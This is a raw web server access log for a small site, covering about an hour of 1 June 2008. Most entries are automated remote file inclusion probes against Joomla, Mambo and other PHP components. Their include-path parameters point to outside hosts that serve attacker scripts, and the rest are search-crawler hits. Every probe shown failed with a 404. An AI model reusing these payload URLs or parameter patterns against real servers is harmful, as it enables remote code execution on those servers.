74.200.201.194 - - [01/Jun/2008:18:06:00 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:06:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:06:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:06:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:06:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:18:08:37 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.106.68 - - [01/Jun/2008:18:08:38 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:18:08:48 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:18:09:58 -0700] "GET /logs/ HTTP/1.0" 200 7643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:10:37 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:18:12:29 -0700] "GET /logs/access_080421.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:18:12:29 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:18:12:30 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:18:13:57 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:18:13:57 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:18:13:57 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
89.188.112.121 - - [01/Jun/2008:18:14:11 -0700] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.205 - - [01/Jun/2008:18:17:47 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.205 - - [01/Jun/2008:18:17:47 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.205 - - [01/Jun/2008:18:17:47 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.232.196.106 - - [01/Jun/2008:18:18:01 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.232.196.106 - - [01/Jun/2008:18:18:01 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.232.196.106 - - [01/Jun/2008:18:18:01 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.205 - - [01/Jun/2008:18:18:05 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.232.196.106 - - [01/Jun/2008:18:18:20 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.195.52.36 - - [01/Jun/2008:18:20:23 -0700] "GET /logs/access_080218.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.52.117 - - [01/Jun/2008:18:21:56 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
64.202.117.159 - - [01/Jun/2008:18:22:27 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.202.117.159 - - [01/Jun/2008:18:22:27 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.200.201.194 - - [01/Jun/2008:18:22:32 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.200.201.194 - - [01/Jun/2008:18:22:32 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.195.54.37 - - [01/Jun/2008:18:23:39 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:18:24:00 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.87.13.42 - - [01/Jun/2008:18:24:00 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:24:11 -0700] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.140.19.142 - - [01/Jun/2008:18:27:07 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:28:50 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:28:52 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:28:53 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:30:35 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:30:35 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:30:35 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:31:36 -0700] "GET /logs/access_080512.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:34:49 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:34:54 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:34:55 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:34:56 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.18.225 - - [01/Jun/2008:18:37:40 -0700] "GET /logs/access_080602.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:38:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.216.249.194 - - [01/Jun/2008:18:38:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.80.70.50 - - [01/Jun/2008:18:41:33 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.80.70.50 - - [01/Jun/2008:18:41:33 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.80.70.50 - - [01/Jun/2008:18:41:33 -0700] "GET /logs/access_080505.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
61.64.112.207 - - [01/Jun/2008:18:43:38 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.72.119.227 - - [01/Jun/2008:18:44:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.80.70.50 - - [01/Jun/2008:18:45:00 -0700] "GET /logs/access_080512.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nigeria-news.net/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.154.38.121 - - [01/Jun/2008:18:45:19 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.195.51.124 - - [01/Jun/2008:18:47:11 -0700] "GET /logs/access_080107.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
200.140.135.103 - - [01/Jun/2008:18:48:59 -0700] "GET /logs/access_080421.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.140.135.103 - - [01/Jun/2008:18:49:00 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.140.135.103 - - [01/Jun/2008:18:49:01 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:49:27 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:49:27 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:49:27 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:50:01 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.11.76.34 - - [01/Jun/2008:18:51:30 -0700] "GET /index.php//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cmd.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.140.135.103 - - [01/Jun/2008:18:52:03 -0700] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.72.119.227 - - [01/Jun/2008:18:52:24 -0700] "GET /logs/access_080421.log//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.119.227 - - [01/Jun/2008:18:52:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.119.227 - - [01/Jun/2008:18:52:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:53:03 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:53:03 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:53:03 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.72.119.227 - - [01/Jun/2008:18:53:27 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.70.80.22 - - [01/Jun/2008:18:53:29 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:54:18 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:54:18 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:54:18 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.195.52.87 - - [01/Jun/2008:18:54:55 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:18:55:07 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
87.106.10.53 - - [01/Jun/2008:18:55:07 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
72.9.228.149 - - [01/Jun/2008:18:56:21 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:57:54 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:57:54 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:18:59:17 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.12.53.176 - - [01/Jun/2008:19:00:33 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:19:01:04 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
83.175.248.213 - - [01/Jun/2008:19:01:04 -0700] "GET /database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
209.62.24.242 - - [01/Jun/2008:19:01:05 -0700] "GET /send_reminders.php?includedir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
72.47.201.117 - - [01/Jun/2008:19:01:23 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
74.8.73.90 - - [01/Jun/2008:19:01:44 -0700] "GET /logs/send_reminders.php?includedir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.8.73.90 - - [01/Jun/2008:19:01:44 -0700] "GET /send_reminders.php?includedir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:02:27 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:02:27 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.26.80 - - [01/Jun/2008:19:02:27 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
168.209.97.42 - - [01/Jun/2008:19:02:32 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:19:02:46 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [01/Jun/2008:19:02:46 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [01/Jun/2008:19:03:08 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [01/Jun/2008:19:03:08 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.101.24 - - [01/Jun/2008:19:03:19 -0700] "GET /logs/send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.101.24 - - [01/Jun/2008:19:03:19 -0700] "GET /send_reminders.php?includedir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
